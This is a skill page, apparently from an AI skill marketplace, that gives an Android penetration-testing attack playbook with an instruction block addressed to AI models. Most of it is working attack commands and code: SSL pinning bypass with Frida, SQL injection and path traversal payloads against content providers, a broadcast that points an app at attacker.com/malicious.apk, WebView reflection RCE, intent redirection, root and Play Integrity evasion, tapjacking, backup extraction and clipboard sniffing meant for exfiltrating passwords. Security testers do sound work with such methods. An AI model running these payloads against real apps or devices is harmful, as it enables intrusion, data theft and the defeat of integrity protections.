android-pentesting-tricks

>-

Views1
PublishedJun 17, 2026

Loading actions...

5 minBeginnerpromptSingle file

Skill content

Main instructions and any bundled files for this skill.

markdown

SKILL: Android Pentesting Tricks — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains.

Before going deep, consider loading:

Advanced Reference

Also load FRIDA_SCRIPTS.md when you need:

  • Ready-to-use Frida script templates for common Android testing tasks
  • Detailed hook points for OkHttp, Retrofit, Volley, WebView
  • Root detection bypass script collection

1. SSL PINNING BYPASS

1.1 Frida Universal Bypass

# Install Frida server on device
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64"
adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"

# Universal SSL pinning bypass
frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pause
Hook PointLibrary/ClassCoverage
X509TrustManager.checkServerTrustedAndroid SDKAll standard HTTPS
OkHttpClient.Builder.sslSocketFactoryOkHttp 3.x/4.xSquare OkHttp
CertificatePinner.checkOkHttp 3.x/4.xOkHttp pinning
HttpsURLConnection.setSSLSocketFactoryAndroid SDKLegacy HTTPS
SSLContext.initAndroid SDKCustom SSL contexts
WebViewClient.onReceivedSslErrorWebViewWebView SSL errors
TrustManagerFactory.getTrustManagersAndroid SDKFactory-created TMs

1.2 Objection (Quick Method)

objection -g com.target.app explore
# Inside Objection REPL:
android sslpinning disable

1.3 Network Security Config (Debug Builds)

If you can modify the APK or it's a debug build:

<!-- res/xml/network_security_config.xml -->
<network-security-config>
  <debug-overrides>
    <trust-anchors>
      <certificates src="user" />  <!-- Trust user-installed CAs -->
    </trust-anchors>
  </debug-overrides>
</network-security-config>

1.4 Magisk Module Approach

ModuleMethodScope
LSPosed + TrustMeAlreadyHooks system-wide TrustManagerAll apps
LSPosed + SSLUnpinningTargeted SSL bypassPer-app
MagiskTrustUserCertsMoves user CA to system storeAll apps trusting system CAs
ConscryptTrustUserCertsPatches ConscryptNewer Android (7+)

2. COMPONENT EXPOSURE

2.1 Exported Activities

# Find exported activities (AndroidManifest.xml or aapt)
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"

# Launch exported activity directly
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DeepLinkActivity \
  -d "target://callback?token=attacker_token"

# With extra data
adb shell am start -n com.target.app/.TransferActivity \
  --es "amount" "99999" --es "recipient" "attacker"

2.2 Content Providers

# Query exposed content providers
adb shell content query --uri content://com.target.app.provider/users

# SQL injection in content provider
adb shell content query --uri "content://com.target.app.provider/users" \
  --where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"

# Path traversal in file-providing content provider
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"
Provider TypeAttack VectorImpact
Database-backedSQL injection via query() projection/selectionData leak, auth bypass
File-backedPath traversal via URIRead arbitrary files
ParcelableType confusion in custom ParcelableCode execution

2.3 Broadcast Receivers

# Send crafted broadcast
adb shell am broadcast -a com.target.app.ACTION_UPDATE \
  --es "url" "http://attacker.com/malicious.apk"

# Ordered broadcast interception (higher priority receiver intercepts first)
# Register receiver with higher priority than target to intercept/modify data

2.4 Exported Services

# Start/bind to exported service
adb shell am startservice -n com.target.app/.BackgroundService \
  --es "command" "exfiltrate"

# List running services
adb shell dumpsys activity services | grep com.target

3. WEBVIEW VULNERABILITIES

3.1 JavaScript Interface RCE (Pre-API 17)

// Vulnerable code: addJavascriptInterface without @JavascriptInterface annotation
webView.addJavascriptInterface(new JSInterface(), "android");

// Pre-API 17: Reflection-based RCE via injected JavaScript
// Inject into WebView:
// android.getClass().forName('java.lang.Runtime')
//   .getMethod('getRuntime').invoke(null).exec('id')

3.2 Modern WebView Attacks

VulnerabilityConditionExploit
setJavaScriptEnabled(true) + untrusted contentJS enabled + attacker controls loaded URLXSS → bridge access
setAllowFileAccessFromFileURLs(true)file:// can read other file://Load file:///data/data/com.target/...
setAllowUniversalAccessFromFileURLs(true)file:// can access any originExfiltrate via XHR to attacker
loadUrl(user_controlled)User input in loadUrljavascript: scheme or file://
shouldOverrideUrlLoading bypassIncomplete URL validationRedirect to attacker-controlled page
evaluateJavascript with tainted dataUser data in JS executionXSS in WebView context
1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html
2. App opens WebView with attacker URL
3. XSS in WebView calls JavaScript bridge: android.sensitiveMethod()
4. Bridge executes in app context with app's permissions

4. INTENT REDIRECTION

Exported activity receives an Intent and starts another (internal) activity using data from the received Intent.

// Vulnerable pattern:
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
// Attacker controls "next_intent" → can start any internal activity
# Exploit: start non-exported internal activity via redirection
adb shell am start -n com.target.app/.ExportedActivity \
  --es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"
PatternIndicatorRisk
getParcelableExtrastartActivityIntent-in-IntentStart non-exported activities
getStringExtra("url")startActivity(Intent.ACTION_VIEW)URL forwardingOpen arbitrary URLs
getStringExtra("class")Class.forNamestartActivityDynamic class loadingStart any activity by name

5. ROOT DETECTION BYPASS

5.1 Common Root Detection Checks

CheckWhat It DetectsFrida Bypass
su binary exists/system/xbin/su, /sbin/suHook File.exists() → return false
Build tags contain "test-keys"Build.TAGSHook Build.TAGS → return "release-keys"
Magisk Manager installedPackage name checkHook PackageManager.getPackageInfo
Superuser.apk presentSu management appHook File.exists()
RootBeer libraryMulti-check root detectionHook all RootBeer check methods
SafetyNet/Play IntegrityServer-side attestationRequires Magisk DenyList + module
Abnormal system propertiesro.debuggable=1, etc.Hook SystemProperties.get

5.2 Magisk DenyList (Previously MagiskHide)

# Enable DenyList in Magisk Manager
# Add target app to DenyList — Magisk hides itself from that app
# Covers: su binary, Magisk Manager package, mount points, props

6. PLAY INTEGRITY / SAFETYNET BYPASS

LevelWhat It ChecksBypass Difficulty
Basic IntegrityNot rooted, not emulatorEasy (Magisk + DenyList)
Device IntegrityBootloader locked, verified bootHard (requires locked bootloader)
Strong IntegrityHardware-backed attestationVery hard (hardware TEE)

Techniques:

  • Magisk with Zygisk enabled + DenyList for target app
  • Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint
  • Shamiko module: hides root from specific apps
  • Custom ROM with locked bootloader (Pixel-specific tricks)

7. TAPJACKING (OVERLAY ATTACKS)

<!-- Malicious overlay activity -->
<activity android:name=".OverlayActivity"
    android:theme="@style/TransparentTheme"
    android:excludeFromRecents="true">
</activity>

<!-- Requires SYSTEM_ALERT_WINDOW permission (draw over other apps) -->
Android VersionProtectionBypass
Pre-6.0NoneFull overlay
6.0–11filterTouchesWhenObscured (opt-in)Apps not using it are vulnerable
12+Untrusted touches blocked for overlay windowsPartial overlays, timing-based

8. BACKUP EXTRACTION

# Check if backup allowed
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
# android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (default!)

# Extract backup
adb backup -f backup.ab -apk com.target.app
# Convert to tar
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
tar xf backup.tar

# Analyze extracted data
find com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json"
# Check shared_prefs/ for tokens, credentials
# Check databases/ for SQLite DBs with sensitive data

9. ADDITIONAL TRICKS

9.1 Debuggable App Exploitation

# If android:debuggable="true" in manifest
adb shell run-as com.target.app
# Now running as the app's user — full data directory access
cat /data/data/com.target.app/shared_prefs/*.xml

9.2 Drozer (Component Testing Framework)

# List attack surface
dz> run app.package.attacksurface com.target.app
# Exported Activities: 3
# Exported Services: 1
# Exported Providers: 2

# Query provider
dz> run app.provider.query content://com.target.app.provider/users
# Scan for injection
dz> run scanner.provider.injection -a com.target.app

9.3 Clipboard Sniffing

// Pre-Android 10: any app can read clipboard
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
    ClipData data = cm.getPrimaryClip();
    // Exfiltrate copied passwords, tokens, etc.
});

10. ANDROID PENTESTING DECISION TREE

Testing Android application

├── Can intercept HTTPS traffic?
│   ├── No → SSL pinning in place
│   │   ├── Frida available? → universal SSL bypass script (§1.1)
│   │   ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│   │   ├── Debug build? → Network Security Config (§1.3)
│   │   └── None above? → manual decompile + patch + repackage
│   └── Yes → proceed to traffic analysis

├── Exported components found?
│   ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│   ├── Content Providers → SQLi, path traversal (§2.2)
│   ├── Broadcast Receivers → crafted intent injection (§2.3)
│   └── Services → unauthorized service binding (§2.4)

├── WebView present?
│   ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│   ├── File access enabled? → file:// scheme abuse (§3.2)
│   └── Deep link → WebView? → URL injection chain (§3.3)

├── Intent handling found?
│   └── Intent-in-Intent pattern? → redirect to internal activity (§4)

├── Root detection blocking testing?
│   ├── Client-side checks only? → Frida hook bypass (§5.1)
│   ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│   └── Custom obfuscated checks? → reverse engineer + targeted hooks

├── Sensitive data storage?
│   ├── allowBackup=true? → ADB backup extraction (§8)
│   ├── Debuggable? → run-as for direct data access (§9.1)
│   └── SharedPreferences → check for plaintext tokens/credentials

└── UI-based attacks applicable?
    └── Overlay possible? → tapjacking (§7)
Share: